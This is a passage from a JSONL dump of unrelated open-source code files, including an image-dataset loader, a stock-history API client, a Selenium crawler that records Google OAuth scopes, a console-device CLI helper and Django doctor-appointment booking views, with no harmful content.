dataset. (train prarm), Default 1\n patch_size(int): train data size. (train param), Default -1\n epoch_size(int): times to repeat dataset for dataset_sink_mode, Default None\n dataset_type(string): choices=(\"train\", \"valid\", \"test\"), Default \"train\"\n num_parallel_workers(int): num-workers to read data, Default 10\n shuffle(bool): shuffle dataset. Default: True\n Returns:\n dataset\n \"\"\"\n dataset_path = config[\"dataset_path\"]\n lr_scale = config[\"scale\"]\n if config[\"eval_type\"] == \"ONNX\":\n lr_type = config.get(\"lr_type\", \"bicubic_AUG_self_ensemble\")\n else:\n lr_type = config.get(\"lr_type\", \"bicubic\")\n batch_size = config.get(\"batch_size\", 1)\n patch_size = config.get(\"patch_size\", -1)\n epoch_size = config.get(\"epoch_size\", None)\n\n # for multi lr scale, such as [2,3,4]\n if isinstance(lr_scale, int):\n multi_lr_scale = [lr_scale]\n else:\n multi_lr_scale = lr_scale\n\n # get HR_PATH/*.png\n dir_hr = os.path.join(dataset_path, f\"DIV2K_{dataset_type}_HR\")\n hr_pattern = os.path.join(dir_hr, \"*.png\")\n\n # get LR_PATH/X2/*x2.png, LR_PATH/X3/*x3.png, LR_PATH/X4/*x4.png\n column_names = []\n lrs_pattern = []\n for lr_scale in multi_lr_scale:\n dir_lr = os.path.join(dataset_path, f\"DIV2K_{dataset_type}_LR_{lr_type}\", f\"X{lr_scale}\")\n if config[\"eval_type\"] == \"ONNX\":\n lr_pattern = os.path.join(dir_lr, f\"*x{lr_scale}_0.png\")\n else:\n lr_pattern = os.path.join(dir_lr, f\"*x{lr_scale}.png\")\n # if dataset_type == \"train\":\n # lr_pattern = os.path.join(dir_lr, f\"*x{lr_scale}.png\")\n # else:\n # lr_pattern = os.path.join(dir_lr, f\"*.png\")\n lrs_pattern.append(lr_pattern)\n column_names.append(f\"lrx{lr_scale}\")\n column_names.append(\"hr\") # [\"lrx2\",\"lrx3\",\"lrx4\",..., \"hr\"]\n\n # make dataset\n dataset = LrHrImages(lr_pattern=lrs_pattern, hr_pattern=hr_pattern)\n\n # make mindspore dataset\n device_num, rank_id = get_rank_info()\n if device_num == 1 or device_num is None:\n generator_dataset = ds.GeneratorDataset(dataset, column_names=column_names,\n num_parallel_workers=num_parallel_workers,\n shuffle=shuffle and dataset_type == \"train\")\n elif dataset_type == \"train\":\n generator_dataset = ds.GeneratorDataset(dataset, column_names=column_names,\n num_parallel_workers=num_parallel_workers,\n shuffle=shuffle and dataset_type == \"train\",\n num_shards=device_num, shard_id=rank_id)\n else:\n sampler = ds.DistributedSampler(num_shards=device_num, shard_id=rank_id, shuffle=False,\n offset=0)\n generator_dataset = ds.GeneratorDataset(dataset, column_names=column_names,\n num_parallel_workers=num_parallel_workers,\n sampler=sampler)\n\n # define map operations\n if dataset_type == \"train\":\n transform_img = [\n RandomPatchCutter(patch_size, multi_lr_scale + [1]),\n flip_and_rotate,\n hwc2chw,\n uint8_to_float32,\n ]\n elif patch_size > 0:\n transform_img = [\n CentrePatchCutter(patch_size, multi_lr_scale + [1]),\n hwc2chw,\n uint8_to_float32,\n ]\n else:\n transform_img = [\n hwc2chw,\n uint8_to_float32,\n ]\n\n # pre-process hr lr\n generator_dataset = generator_dataset.map(input_columns=column_names,\n output_columns=column_names,\n operations=transform_img)\n\n # apply batch operations\n generator_dataset = generator_dataset.batch(batch_size, drop_remainder=False)\n\n # apply repeat operations\n if dataset_type == \"train\" and epoch_size is not None and epoch_size != 1:\n generator_dataset = generator_dataset.repeat(epoch_size)\n\n return generator_dataset\n","sub_path":"research/cv/GhostSR/src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":11555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"519886052","text":"import unittest\nfrom my_decorators import accepts, say_hello, deposit, encrypt, get_low\n\n\nclass MyDecoratorsTests(unittest.TestCase):\n\n def test_accepts(self):\n with self.subTest(\"test say_hello raise TypeError\"):\n with self.assertRaises(TypeError):\n say_hello(4)\n\n with self.subTest(\"test deposit raise TypeError\"):\n with self.assertRaises(TypeError):\n deposit(4, [])\n\n def test_encript(self):\n expected = \"Igv igv igv nqy\"\n self.assertEqual(expected, get_low())\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"week06/test_my_decorators.py","file_name":"test_my_decorators.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"321617423","text":"import datetime\nimport os\nimport requests\nimport pandas as pd\nimport time\nimport random\nfrom tqdm import tqdm\nfrom multiprocessing import Pool\nfrom dotenv import load_dotenv\nfrom typing import Union, List\nfrom . import Types\nload_dotenv()\n\n\ntradier_url = 'https://api.tradier.com'\n\n\ndef load_env_file(path: str):\n load_dotenv(path)\n\n\ndef _get_historical(symbol: Types.Symbol, start: Union[None, Types.Datetime] = None, end: Union[None, Types.Datetime] = None, rate_limit: bool = False):\n def process_frame(sf: Types.StockFrame, symbol: Types.Symbol):\n sf = sf.dropna()\n sf = sf.rename(columns={'date': 'timestamp'})\n sf['symbol'] = symbol.upper()\n sf['timestamp'] = pd.to_datetime(sf['timestamp'], utc=True)\n sf['timestamp'] = sf['timestamp'].dt.tz_convert('US/Eastern')\n sf['timestamp'] = sf['timestamp'].apply(lambda x: (\n x + datetime.timedelta(hours=12)).replace(hour=16, minute=30))\n sf = sf.drop_duplicates(subset=['timestamp'])\n sf = sf.set_index('timestamp')\n return sf\n\n if rate_limit:\n time.sleep(random.randrange(1, 20) / 10.0)\n\n url = '%s/v1/markets/history' % tradier_url\n params = {\n 'symbol': symbol.upper(),\n 'interval': 'daily',\n }\n if start is not None:\n params['start'] = start.strftime('%Y-%m-%d')\n if end is not None:\n params['end'] = end.strftime('%Y-%m-%d')\n\n headers = {\n 'Authorization': 'Bearer %s' % os.getenv('TRADIER_TOKEN'),\n 'Accept': 'application/json'\n }\n\n response = requests.get(url, params=params, headers=headers)\n try:\n json_response = response.json()\n sf: Types.StockFrame = pd.DataFrame(json_response['history']['day'])\n sf = process_frame(sf, symbol)\n return sf\n except:\n print('%s from %s to %s failed' %\n (symbol, params['start'], params['end']))\n return None\n\n\ndef get_historical(symbols: List[Types.Symbol], start: Union[None, Types.Datetime] = None, end: Union[None, Types.Datetime] = None):\n jobs = []\n pool = Pool(processes=10)\n\n for symbol in symbols:\n jobs.append(pool.apply_async(func=_get_historical,\n args=(symbol, start, end, True)))\n pool.close()\n results = []\n for job in tqdm(jobs):\n results.append(job.get())\n\n return [i for i in results if i is not None]\n","sub_path":"src/MarketGym/TradierLib.py","file_name":"TradierLib.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"588816564","text":"#! /usr/bin/python\n#coding=utf-8\n\n\"\"\"工具集合\"\"\"\nimport urllib\nimport socket\nimport time\nimport chardet\nfrom lxml import etree\nfrom impt import msgResolver, smsproxy, mongodb, db_user, db_nochk, rroster_tablename\n\nMsg = msgResolver()\nUDPSOCK = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\ndef encode_utf8(data):\n \"\"\"转化为utf8格式并返回\"\"\"\n '''\n if isinstance(data, unicode):\n return data.encode(\"utf-8\")\n elif not isinstance(data, str):\n return str(data)\n else:\n return data\n '''\n temp = bs2unicode(data)\n return temp.encode('utf-8') if isinstance(temp, unicode) else temp\n\ndef bs2unicode(basestr):\n if not isinstance(basestr, basestring):\n return basestr\n\n if isinstance(basestr, unicode):\n return basestr\n\n encode = chardet.detect(basestr).get('encoding')\n return basestr.decode(encode)\n\ndef xml_reg_user_presence(user_list, iq_from, iq_type):\n \"\"\"生成状态订阅xml\"\"\"\n xml = etree.XML(\"\")\n\n attr = xml.attrib\n attr['from'] = iq_from\n attr['type'] = iq_type\n\n for user in user_list:\n u_xml = etree.Element(\"user\")\n xml_text(u_xml, user)\n xml[0].append(u_xml)\n\n return xml\n\ndef protocol_to_ims():\n \"\"\"\n 网关到ims协议转化\n logic_browser.py, dispatch 函数\n \n try:\n logic_func = self.logic_dispatch[request['invoke']]\n logic_func(request, uid)\n except KeyError:\n #协议翻译与转发\n self.users.save_info(uid, 'r_sn', request['sn'])\n self.toims(header, uid)\n\n 因此在逻辑操作抛出KeyError异常后,程序可进入协议转发部分\n 只能在logic_func同步操作过程中使用\n\n \"\"\"\n raise KeyError\n \ndef request_to_buf(request):\n \"\"\"还原buf,无参数检测,使用时注意\"\"\" \n argbuf = ''\n for key in request:\n if not (key in ['inovke', 'sn', 'sid', 'callback', 'rnd']):\n argbuf += \"%s=%s&\" % (key, request[key])\n\n buf = 'invoke=%s&sn=%s&sid=%s&%scallback=_imback&rnd=%s' % (\n request['invoke'], request['sn'], request['sid'], argbuf, \n request['rnd'])\n\n return buf \n\n \ndef protocol_to_ims_async(request, username, conn):\n \"\"\"logic_func过程中异步操作\"\"\"\n\n buf = request_to_buf(request)\n\n datas = Msg.b2gw(buf, username)\n if not datas:\n return \n \n conn.sendto_ims(datas[4], request['sid']) \n\ndef url_unquote(request):\n \"\"\"unquote字典\"\"\"\n for key in request:\n request[key] = urllib.unquote(request[key])\n\ndef xml_set(xml, attr, value):\n \"\"\"xml包裹函数\"\"\"\n if value == None:\n xml.set(attr, \"\")\n return\n\n if isinstance(value, unicode):\n xml.set(attr, value)\n return \n\n try:\n xml.set(attr, value.decode(\"utf-8\"))\n except UnicodeEncodeError:\n xml.set(attr, \"\")\n\ndef xml_text(xml, text):\n \"\"\"xml包裹函数\"\"\"\n if text == None:\n xml.text = None\n return\n \n if isinstance(text, unicode):\n xml.text = text\n return \n \n try:\n xml.text = text.decode(\"utf-8\")\n except UnicodeDecodeError:\n return \n\n\ndef sms_send(telno, msg, send_time = None):\n \"\"\"发短信\"\"\"\n if not send_time:\n send_time = int(time.time())\n\n cmd = \"1401_%s_%s_%s\" % (telno, send_time, msg)\n\n UDPSOCK.sendto(cmd, smsproxy)\n \n\ndef utf8_hexstr(string):\n \"\"\"utf8 hex字符打印\"\"\"\n buf = ''\n for letter in string:\n buf += r\"\\x%x\" % ord(letter)\n \n return buf\n\ndef rbuddy_refresh(rbuddy_list, to, username, conn):\n \"\"\"刷新最近联系人列表\"\"\"\n rbuddy_list.push(to)\n\n db = mongodb(db_user)\n table = db[rroster_tablename]\n cmd = table.update({'userid': username}, {'userid': username, \\\n 'rbuddy':rbuddy_list.items()}, upsert = True) \n\n conn.db_opt(cmd, db_nochk, None)\n","sub_path":"python/server/serverd/logic/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":3939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"424044479","text":"n = int(input())\narr = []\n\nfor _ in range(n):\n x, y = list(map(int, input().split()))\n arr.append([x, y])\n\ndef cal(a, b):\n x1, y1 = a\n x2, y2 = b\n\n n1 = pow(x1 - x2, 2)\n n2 = pow(y1 - y2, 2)\n\n result = n1 + n2\n\n return result\n\n\ndef _2261(arr):\n min_r = 500\n \n n = len(arr)\n \n if(n == 1):\n return min_r\n\n if(n == 2):\n min_r = cal(arr[0], arr[1])\n return min_r\n \n m = n // 2\n \n left = _2261(arr[:m])\n right = _2261(arr[m:])\n middle = cal(arr[m-1],arr[m])\n\n result = min(left, right, min_r, middle)\n\n return result\n\narr.sort(key = lambda x : (x[0],x[1]))\nhmm = _2261(arr)\narr.sort(key = lambda x : (x[1],x[0]))\nhmm2 = _2261(arr)\n\nresult = min(hmm, hmm2)\n\nprint(result)","sub_path":"by category/divide&conquer/2261.py","file_name":"2261.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"626187916","text":"'''\nCreated by gluthier on 10/01/2016\n'''\n\nimport json\nimport re\nimport time\nimport sys\nfrom lxml import etree\nimport selenium.webdriver as webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom io import StringIO\n\nscopes = {\n\t'drive[^.]': 'https://www.googleapis.com/auth/drive',\n\t'drive.readonly': 'https://www.googleapis.com/auth/drive.readonly',\n\t'drive.appfolder': 'https://www.googleapis.com/auth/drive.appfolder',\n\t'drive.apps.readonly': 'https://www.googleapis.com/auth/drive.apps.readonly',\n\t'drive.file': 'https://www.googleapis.com/auth/drive.file',\n\t'drive.install': 'https://www.googleapis.com/auth/drive.install',\n\t'drive.metadata[^.]': 'https://www.googleapis.com/auth/drive.metadata',\n\t'drive.metadata.readonly': 'https://www.googleapis.com/auth/drive.metadata.readonly',\n\t'drive.photos.readonly': 'https://www.googleapis.com/auth/drive.photos.readonly',\n\t'drive.scripts': 'https://www.googleapis.com/auth/drive.scripts',\n\t'drive.appdata': 'https://www.googleapis.com/auth/drive.appdata',\n\t'userinfo.email': 'https://www.googleapis.com/auth/userinfo.email',\n\t'userinfo.profile': 'https://www.googleapis.com/auth/userinfo.profile',\n\t'plus.login': 'https://www.googleapis.com/auth/plus.login',\n\t'plus.me': 'https://www.googleapis.com/auth/plus.me',\n\t'plus.profiles.read': 'https://www.googleapis.com/auth/plus.profiles.read',\n\t'calendar[^.]': 'https://www.googleapis.com/auth/calendar',\n\t'calendar.readonly': 'https://www.googleapis.com/auth/calendar.readonly'\n}\n\ncandidates = ['drive', 'google', 'oauth', 'authorize', 'sign', 'login', 'load', 'open', 'account', 'select', 'start', 'log']\n\ndef retrievePermissions(url):\n\tfound = False\n\ttry:\n\t\tfor s in scopes:\n\t\t\tp = re.compile('https(?:%3A|:)(?:%2F|/){2}www.googleapis.com(?:%2F|/)auth(?:%2F|/)('+s+')')\n\t\t\tif p.search(url):\n\t\t\t\tfound = True\n\t\t\t\tprint(\" \" + scopes[s])\n\t\treturn found\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n\ndef closeEventualAlert(driver):\n\ttry:\n\t\tWebDriverWait(driver, 1).until(EC.alert_is_present())\n\t\talert = driver.switch_to_alert()\n\t\talert.accept()\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n\ndef clickElement(xpath, follow, driver):\n\tfound = False\n\tmain_window = driver.current_window_handle\n\tmain_window_url = driver.current_url\n\tbefore_click_page_len = len(driver.page_source)\n\tlen_page_after_click_diff = False\n\ttry:\n\t\telem = driver.find_element_by_xpath(xpath)\n\t\tif elem and elem.is_displayed():\n\t\t\telem.click()\n\t\t\tcloseEventualAlert(driver)\n\t\t\t# check if click changed the content of the page\n\t\t\tif len(driver.page_source) != before_click_page_len:\n\t\t\t\tlen_page_after_click_diff = True\n\t\t\tfor handle in driver.window_handles:\n\t\t\t\tdriver.switch_to.window(handle)\n\t\t\t\tcurrent_url = driver.current_url\n\t\t\t\tif follow:\n\t\t\t\t\t# if we want to retrieve the permissions after the click\n\t\t\t\t\tfound = retrievePermissions(current_url)\n\t\t\t\tif current_url != main_window_url:\n\t\t\t\t\tdriver.back()\n\t\t\t\t\tcloseEventualAlert(driver)\n\t\t\t\tif handle != main_window:\n\t\t\t\t\tdriver.close()\n\t\t\t\t\tcloseEventualAlert(driver)\n\t\t\t\tdriver.switch_to_window(main_window)\n\t\treturn found, len_page_after_click_diff # return also if the click changed the page\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n\ndef findElementsInPage(driver):\n\txpaths = []\n\ttry:\n\t\thtml = driver.page_source\n\t\ttree = etree.parse(StringIO(html)) # build a tree from a page\n\t\tfor elem in tree.iter():\n\t\t\txpath = tree.getpath(elem)\n\t\t\tif xpath and \"()\" not in xpath: # avoid xpath of this kind: /*/*[2]/comment()[1]\n\t\t\t\te = driver.find_element_by_xpath(xpath)\n\t\t\t\tif e:\n\t\t\t\t\tcandidate_found = False\n\t\t\t\t\tfor c in candidates:\n\t\t\t\t\t\tif str(e.get_attribute('id')).lower().find(c) >= 0 or str(e.get_attribute('title')).lower().find(c) >= 0 or str(e.get_attribute('class')).lower().find(c) >= 0 or str(e.text).lower().find(c) >= 0:\n\t\t\t\t\t\t\tcandidate_found = True\n\t\t\t\t\t\t\tif xpath not in xpaths:\n\t\t\t\t\t\t\t\txpaths.append(xpath)\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n\tfinally:\n\t\trelevant_xpaths = []\n\t\tfor xp in xpaths:\n\t\t\t(found, page_diff) = clickElement(xp, True, driver)\n\t\t\tif found:\n\t\t\t\treturn True, relevant_xpaths\n\t\t\tif page_diff:\n\t\t\t\trelevant_xpaths.append(xp)\n\t\treturn False, relevant_xpaths\n\ndef crawlPage(url, xpaths, driver):\n\tfound = False\n\ttry:\n\t\tdriver.get(url)\n\t\tcloseEventualAlert(driver)\n\t\tfound = retrievePermissions(url)\n\t\tif not found:\n\t\t\t# initial call\n\t\t\tif not xpaths:\n\t\t\t\t(found, new_xpaths) = findElementsInPage(driver)\n\t\t\t\tif not found and new_xpaths:\n\t\t\t\t\tfound = crawlPage(url, new_xpaths, driver)\n\t\t\t# recursive call\n\t\t\telse:\n\t\t\t\tfor xp in xpaths:\n\t\t\t\t\tclickElement(xp, False, driver)\n\t\t\t\t\t# we relaunch the script after click on the element associated to the xpath\n\t\t\t\t\t(found, new_xpaths) = findElementsInPage(driver)\n\t\t\t\t\tif found:\n\t\t\t\t\t\treturn True\n\t\t\t\treturn False\n\t\treturn found\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n\ndef runAdvancedCrawler(url, driver):\n\ttry:\n\t\tif url:\n\t\t\tprint('Crawling (advanced attempt): ' + url)\n\t\t\t# we first call the script with the second argument containing xpaths empty\n\t\t\treturn crawlPage(url, [], driver)\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n","sub_path":"bachelor project/advanced_crawler.py","file_name":"advanced_crawler.py","file_ext":"py","file_size_in_byte":5220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"385054992","text":"import cv2\r\ncap = cv2.VideoCapture('FAT.mp4')\r\ni = 0\r\nwhile(cap.isOpened()):\r\n ret, frame = cap.read()\r\n if ret == False:\r\n break\r\n cv2.imshow('hello', frame)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n cv2.imwrite(str(i) + '.jpg', frame)\r\n i += 1\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()","sub_path":"FInalAssignment/Extractiing-frame-from-vid.py","file_name":"Extractiing-frame-from-vid.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"427875881","text":"#!/usr/bin/env python\n#\n# lib.py\n#\n# Helper code for CLI for interacting with switches via console device\n#\n\ntry:\n import click\n import re\n import subprocess\n import sys\nexcept ImportError as e: \n raise ImportError(\"%s - required module not found\" % str(e))\n\nDEVICE_PREFIX = \"/dev/ttyUSB\"\n\nERR_CMD = 1\nERR_DEV = 2\n\n# runs command, exit if stderr is written to, returns stdout otherwise\n# input: cmd (str), output: output of cmd (str)\ndef run_command(cmd):\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n output = proc.stdout.read()\n error = proc.stderr.read()\n if error != \"\":\n click.echo(\"Command resulted in error: {}\".format(error))\n sys.exit(ERR_CMD)\n return output\n\n# returns a sorted list of all devices (whose name matches DEVICE_PREFIX)\ndef getAllDevices():\n cmd = \"ls \" + DEVICE_PREFIX + \"*\"\n output = run_command(cmd)\n \n devices = output.split('\\n')\n devices = list(filter(lambda dev: re.match(DEVICE_PREFIX + r\"\\d+\", dev) != None, devices))\n devices.sort(key=lambda dev: int(dev[len(DEVICE_PREFIX):]))\n \n return devices\n\n# exits if inputted line number does not correspond to a device\n# input: linenum\ndef checkDevice(linenum):\n devices = getAllDevices()\n if DEVICE_PREFIX + str(linenum) not in devices:\n click.echo(\"Line number {} does not exist\".format(linenum))\n sys.exit(ERR_DEV)\n\n# returns a dictionary of busy devices and their info\n# maps line number to (pid, process start time)\ndef getBusyDevices():\n cmd = 'ps -eo pid,lstart,cmd | grep -E \"(mini|pico)com\"'\n output = run_command(cmd)\n processes = output.split('\\n')\n \n # matches any number of spaces then any number of digits\n regexPid = r\" *(\\d+)\"\n # matches anything of form: Xxx Xxx 00 00:00:00 0000\n regexDate = r\"([A-Z][a-z]{2} [A-Z][a-z]{2} \\d{2} \\d{2}:\\d{2}:\\d{2} \\d{4})\"\n # matches any non-whitespace characters ending in minicom or picocom, \n # then a space and any chars followed by /dev/ttyUSB, \n # then a space and any chars\n regexCmd = r\"\\S*(?:(?:mini)|(?:pico))com .*\" + DEVICE_PREFIX + r\"(\\d+)(?: .*)?\"\n regexProcess = re.compile(r\"^\"+regexPid+r\" \"+regexDate+r\" \"+regexCmd+r\"$\")\n \n busyDevices = {}\n for process in processes:\n match = regexProcess.match(process)\n if match != None:\n pid = match.group(1)\n date = match.group(2)\n linenum_key = match.group(3)\n busyDevices[linenum_key] = (pid, date)\n return busyDevices\n\n# returns baud rate of device corresponding to line number\n# input: linenum (str)\ndef getBaud(linenum):\n checkDevice(linenum)\n cmd = \"sudo stty -F \" + DEVICE_PREFIX + str(linenum)\n output = run_command(cmd)\n \n match = re.match(r\"^speed (\\d+) baud;\", output)\n if match != None:\n return match.group(1)\n else:\n click.echo(\"Unable to determine baud rate\")\n return \"\"\n","sub_path":"consutil/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"343486635","text":"# requests get和post\nimport requests\n\n# get\nr = requests.get('https://www.baidu.com')\nr.encoding = 'utf-8'\nprint(r.encoding)\nprint(r.text)\n# post\n# pr = requests.post('http://httpbin.org/post', data={'key': 'value'})\n\n# get带参数\n# r2 = requests.get('http://httpbin.org/get', params={'key1': 'value1', 'key2': 'value2'})\n# print(r2.url)\n","sub_path":"test02-requests-getpost.py","file_name":"test02-requests-getpost.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"474008013","text":"from datetime import datetime as dt\r\n\r\nimport jdatetime\r\nfrom django.shortcuts import redirect\r\nfrom django.utils.safestring import mark_safe\r\nfrom django.views.generic import ListView\r\n\r\nfrom .models import *\r\nfrom .utils import Calendar\r\n\r\nPERCENT = 0.10\r\n\r\n\r\ndef get_date(req_day):\r\n if req_day:\r\n year, month = (int(x) for x in req_day.split('-'))\r\n return year, month, 1\r\n return dt.today().year, dt.today().month, dt.today().day\r\n\r\n\r\nclass PatientCalendarView(ListView):\r\n model = Event\r\n template_name = 'calendar/calendar.html'\r\n\r\n def get_context_data(self, **kwargs):\r\n context = super().get_context_data(**kwargs)\r\n # use today's date for the calendar\r\n d = get_date(self.request.GET.get('day', None))\r\n\r\n doc = self.kwargs['pk']\r\n clicks, _ = CalenderWeekClicks.objects.get_or_create(doctor_user_id=doc, patient_user_id=self.request.user.id)\r\n back_or_forward = clicks.number_clicks\r\n\r\n if self.kwargs['week_num'] == '0':\r\n back_or_forward = 0\r\n\r\n clicks.number_clicks = back_or_forward\r\n clicks.save()\r\n cal = Calendar(d[0], d[1], d[2], doc, curr_user=self.request.user, offset=back_or_forward)\r\n\r\n # Call the formatmonth method, which returns our calendar as a table\r\n html_cal = cal.format_month()\r\n context['calendar'] = mark_safe(html_cal)\r\n context['doctor'] = doc\r\n return context\r\n\r\n\r\ndef next_week(request, pk, week_num):\r\n doc = pk\r\n clicks, _ = CalenderWeekClicks.objects.get_or_create(doctor_user_id=doc, patient_user_id=request.user.id)\r\n back_or_forward = clicks.number_clicks\r\n\r\n if week_num == '1':\r\n back_or_forward += 1\r\n elif week_num == '2':\r\n back_or_forward -= 1\r\n elif week_num == '0':\r\n back_or_forward = 0\r\n\r\n clicks.number_clicks = back_or_forward\r\n clicks.save()\r\n return redirect('doctor_calendar:calendar', pk=doc, week_num=3)\r\n\r\n\r\ndef doctor_next_week(request, week_num):\r\n doc = request.user\r\n clicks, _ = DoctorCalenderWeekClicks.objects.get_or_create(doctor_user_id=doc)\r\n back_or_forward = clicks.number_clicks\r\n\r\n # Instantiate our calendar class with today's year and date\r\n if week_num == '1':\r\n back_or_forward += 1\r\n elif week_num == '2':\r\n back_or_forward -= 1\r\n elif week_num == '0':\r\n back_or_forward = 0\r\n\r\n clicks.number_clicks = back_or_forward\r\n clicks.save()\r\n return redirect('doctor_calendar:schedule', week_num=3)\r\n\r\n\r\nclass DoctorCalenderView(ListView):\r\n model = Event\r\n template_name = 'calendar/doctor_calender.html'\r\n\r\n def get_context_data(self, **kwargs):\r\n context = super().get_context_data(**kwargs)\r\n\r\n # use today's date for the calendar\r\n d = get_date(self.request.GET.get('day', None))\r\n doc = self.request.user.id\r\n clicks, _ = DoctorCalenderWeekClicks.objects.get_or_create(doctor_user_id=doc)\r\n back_or_forward = clicks.number_clicks\r\n\r\n if self.kwargs['week_num'] == '0':\r\n back_or_forward = 0\r\n clicks.number_clicks = back_or_forward\r\n clicks.save()\r\n\r\n # Instantiate our calendar class with today's year and date\r\n cal = Calendar(d[0], d[1], d[2], self.request.user.pk, curr_user=self.request.user, offset=back_or_forward)\r\n # Call the formatmonth method, which returns our calendar as a table\r\n html_cal = cal.format_month()\r\n context['calendar'] = mark_safe(html_cal)\r\n return context\r\n\r\n\r\nclass VerifyView(ListView):\r\n template_name = 'calendar/verify.html'\r\n is_successful = False\r\n doctor = None\r\n date = None\r\n time = None\r\n\r\n def get_queryset(self):\r\n me = User.objects.get(is_staff=True)\r\n query_name = self.request.GET.get('q1')\r\n date_and_time = query_name.split('#')\r\n date = date_and_time[0].split(\"-\")\r\n self.date = date\r\n self.time = date_and_time[1]\r\n doctor = DoctorProfileInfo.objects.get(user_id=self.kwargs['pk'])\r\n self.doctor = doctor\r\n patient = PatientProfileInfo.objects.get(user_id=self.request.user)\r\n\r\n if patient.credit < doctor.fee:\r\n self.is_successful = False\r\n else:\r\n doctor.credit += doctor.fee\r\n patient.credit -= doctor.fee\r\n me.bank += doctor.fee / 10\r\n print(me.bank)\r\n me.save()\r\n doctor.save()\r\n patient.save()\r\n s = Event(doctor_user=User.objects.filter(pk=self.kwargs['pk'])[0], patient_user=self.request.user,\r\n title='رزرو شده',\r\n start_time=jdatetime.date(int(date[0]), int(date[1]), int(date[2])),\r\n start_hour=date_and_time[1])\r\n s.save()\r\n self.is_successful = True\r\n\r\n def get_context_data(self, **kwargs):\r\n context = {\r\n 'success': self.is_successful,\r\n 'address': self.doctor.address,\r\n 'name': self.doctor.user.name,\r\n 'lname': self.doctor.user.family_name,\r\n 'day': self.date[2],\r\n 'month': self.date[1],\r\n 'year': self.date[0],\r\n 'hour': self.time,\r\n 'doc_pk': self.doctor.user.pk\r\n\r\n }\r\n\r\n return context\r\n\r\n\r\ndef cancel(request, doc_pk, usr_pk, evt_pk):\r\n event = Event.objects.get(id=evt_pk)\r\n doctor = DoctorProfileInfo.objects.get(user_id=doc_pk)\r\n try:\r\n patient = PatientProfileInfo.objects.get(user_id=usr_pk)\r\n except Exception:\r\n patient = DoctorProfileInfo.objects.get(user_id=usr_pk)\r\n doctor.credit -= doctor.fee * (1 - PERCENT)\r\n patient.credit += doctor.fee * (1 - PERCENT)\r\n doctor.save()\r\n patient.save()\r\n event.delete()\r\n","sub_path":"SAD/doctor_calendar/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"588125150","text":"\n\n@with_seed()\ndef test_spatial_transformer_with_type():\n data = mx.sym.Variable('data')\n loc = mx.sym.Flatten(data)\n loc = mx.sym.FullyConnected(data=loc, num_hidden=10)\n loc = mx.sym.Activation(data=loc, act_type='relu')\n loc = mx.sym.FullyConnected(data=loc, num_hidden=6)\n sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10), transform_type='affine', sampler_type='bilinear')\n ctx_list = [{\n 'ctx': mx.gpu(0),\n 'data': (1, 5, 10, 10),\n 'type_dict': {\n 'data': np.float64,\n },\n }, {\n 'ctx': mx.cpu(0),\n 'data': (1, 5, 10, 10),\n 'type_dict': {\n 'data': np.float64,\n },\n }]\n check_consistency(sym, ctx_list)\n check_consistency(sym, ctx_list, grad_req='add')\n","sub_path":"Data Set/bug-fixing-1/f7a00250cf83ba34779b7c6ffc02532d20795f2f--fix.py","file_name":"f7a00250cf83ba34779b7c6ffc02532d20795f2f--fix.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"205890895","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.core.mail import send_mail\nfrom .models import Contact\n\n\ndef contact(request):\n if request.method == 'POST' and request.user.is_authenticated:\n listing_id = request.POST['listing_id']\n name = request.POST['name']\n listing = request.POST['listing']\n email = request.POST['email']\n phone = request.POST['phone']\n message = request.POST['message']\n user_id = request.POST['user_id']\n realtor_email = request.POST['realtor_email']\n\n # Проверка делали ли авторизованный пользователь запрос по дому\n\n if request.user.is_authenticated:\n user_id = request.user.id\n has_contacted = Contact.objects.all().filter(listing_id=listing_id, user_id=user_id)\n if has_contacted:\n messages.error(request, 'Вы уже делали запрос по этому дому')\n return redirect('/listings/'+listing_id)\n\n contact = Contact(listing=listing, listing_id=listing_id, name=name, email=email,\n phone=phone, message=message, user_id=user_id)\n\n contact.save()\n\n # Send email\n\n send_mail(\n 'Исходящий запрос с сайта BTRE: ' + listing,\n 'Запрос по дому' + listing + '. 